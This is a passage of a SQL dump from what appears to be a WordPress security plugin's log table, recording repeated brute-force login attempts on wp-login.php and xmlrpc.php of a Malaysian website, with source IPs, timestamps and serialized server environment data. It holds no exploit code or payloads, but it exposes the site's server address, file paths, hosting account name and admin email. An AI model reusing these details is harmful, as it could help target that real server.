12:13:08',17738304,19228352,'https://bintara.com.my/wp-login.php',1,0,'5.135.207.118'),(24109,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"5.135.207.118\";s:11:\"REMOTE_PORT\";s:5:\"33834\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX98V3PgbK7GuRh1kKnQRQAAAIA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568635991.2361\";s:12:\"REQUEST_TIME\";s:10:\"1568635991\";}}','notice','2019-09-16 12:13:12','2019-09-16 12:13:11',18253544,19550792,'https://bintara.com.my/xmlrpc.php',1,0,'5.135.207.118'),(24110,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:10:\"5.196.12.2\";s:11:\"REMOTE_PORT\";s:5:\"43946\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9@EnPgbK7GuRh1kKnSmAAAAI8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568636434.2321\";s:12:\"REQUEST_TIME\";s:10:\"1568636434\";}}','notice','2019-09-16 12:20:35','2019-09-16 12:20:34',17737544,19227864,'https://bintara.com.my/wp-login.php',1,0,'5.196.12.2'),(24111,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:10:\"5.196.12.2\";s:11:\"REMOTE_PORT\";s:5:\"44660\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9@FXPgbK7GuRh1kKnSmQAAAIU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568636437.1157\";s:12:\"REQUEST_TIME\";s:10:\"1568636437\";}}','notice','2019-09-16 12:20:38','2019-09-16 12:20:37',18252136,19548832,'https://bintara.com.my/xmlrpc.php',1,0,'5.196.12.2'),(24112,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"192.241.190.85\";s:11:\"REMOTE_PORT\";s:5:\"61858\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9@aGf5CPZPc3WLyovDvQAAANE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568636520.8659\";s:12:\"REQUEST_TIME\";s:10:\"1568636520\";}}','notice','2019-09-16 12:22:02','2019-09-16 12:22:01',17738328,19228200,'https://bintara.com.my/wp-login.php',1,0,'192.241.190.85'),(24113,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"192.241.190.85\";s:11:\"REMOTE_PORT\";s:5:\"62412\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9@bL1rBLb0GV3O7mThBgAAAEk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568636524.1241\";s:12:\"REQUEST_TIME\";s:10:\"1568636524\";}}','notice','2019-09-16 12:22:05','2019-09-16 12:22:04',18253216,19549056,'https://bintara.com.my/xmlrpc.php',1,0,'192.241.190.85'),(24114,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"119.28.180.62\";s:11:\"REMOTE_PORT\";s:5:\"46902\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@BPGf5CPZPc3WLyovEiwAAAME\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568637244.691\";s:12:\"REQUEST_TIME\";s:10:\"1568637244\";}}','notice','2019-09-16 12:34:06','2019-09-16 12:34:05',17737816,19228104,'https://bintara.com.my/wp-login.php',1,0,'119.28.180.62'),(24115,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"119.28.180.62\";s:11:\"REMOTE_PORT\";s:5:\"47230\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@BP3PgbK7GuRh1kKnVYgAAAI8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568637247.9962\";s:12:\"REQUEST_TIME\";s:10:\"1568637247\";}}','notice','2019-09-16 12:34:09','2019-09-16 12:34:08',18252928,19548544,'https://bintara.com.my/xmlrpc.php',1,0,'119.28.180.62'),(24116,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"103.90.224.155\";s:11:\"REMOTE_PORT\";s:5:\"40494\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@BoGf5CPZPc3WLyovErQAAANU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568637344.5766\";s:12:\"REQUEST_TIME\";s:10:\"1568637344\";}}','notice','2019-09-16 12:35:46','2019-09-16 12:35:45',17737416,19227840,'https://bintara.com.my/wp-login.php',1,0,'103.90.224.155'),(24117,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"103.90.224.155\";s:11:\"REMOTE_PORT\";s:5:\"41286\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@Bo3PgbK7GuRh1kKnVpQAAAIc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568637347.9118\";s:12:\"REQUEST_TIME\";s:10:\"1568637347\";}}','notice','2019-09-16 12:35:49','2019-09-16 